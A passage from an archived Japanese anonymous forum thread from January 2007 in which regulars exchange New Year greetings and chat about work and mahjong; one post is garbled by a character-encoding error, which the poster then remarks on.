とレスしたかったのです(´▽`;)

110 :◆orcESIqFoA :2007/01/13(土) 21:56:15 ID:G87BY0sa
>揚羽たん
あぁげはたぁんヽ(●´∨'●)ノ


ただいまです、
あけおめです、
ことよろです、
仕事おつですΣ(・д・`)

111 :なっしゃん@携帯 ◆SEGApSaId. :2007/01/14(日) 13:24:44 ID:AxelHvK4
アゲハたん仕事乙!
オレ最近元気ないよー
誰も麻雀付き合ってくれないんだもん
うおー雀荘行きてー!
でも一人で行ったらカモられるーw

112 :ъ( ^ー^) <キラキラ☆ ◆XGdggPFE4A :2007/01/14(日) 14:26:14 ID:M9Jdt9Iq
みなさんおひさしぶり、春たんの彼氏のキラキラです!
春たん、アゲハたん、なっしゃん
あけお、ことよ、仕事乙!

春たん、心配したよ!何か悩みでもあるなら、俺がいつでも相談にのるよ!
アゲハたん、今度トラック乗せてくれ!
なっしゃん、麻雀はやりだすと時間があっというまだからね!

また、みんなでゆっくりと話せたらいいね!

113 :譏・ ◆orcESIqFoA :2007/01/18(木) 16:54:55 ID:8m2Fsb/n
繧ュ繝ゥ縺溘s縺翫イ縺輔@縺カ繧翫〒縺(ツエ笆スス*)

縺昴s縺ェ縺薙→險縺」縺溘i蠖シ螂ウ縺輔s縺ォ諤偵i繧後■繧縺縺セ縺吶h(繝サ竏繝サ)セセ費セセ費ス


縺繧阪>繧阪≠繧翫∪縺励◆縺檎ォ九■逶エ繧翫∪縺励◆シ√>縺壹l隨代>隧ア縺ォ縺励※隧ア縺励◆縺縺ィ諤昴>縺セ縺吶ュシ


莉翫ッ繝繧ケ繝亥級蠑キ縺ァ豁サ縺ォ縺昴≧縺ァ縺(ツエ縲懶ス)

114 :◆orcESIqFoA :2007/01/18(木) 17:56:02 ID:8m2Fsb/n
なんかもう、書くなって言われてるような文字化けです(pω・`。)

29 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)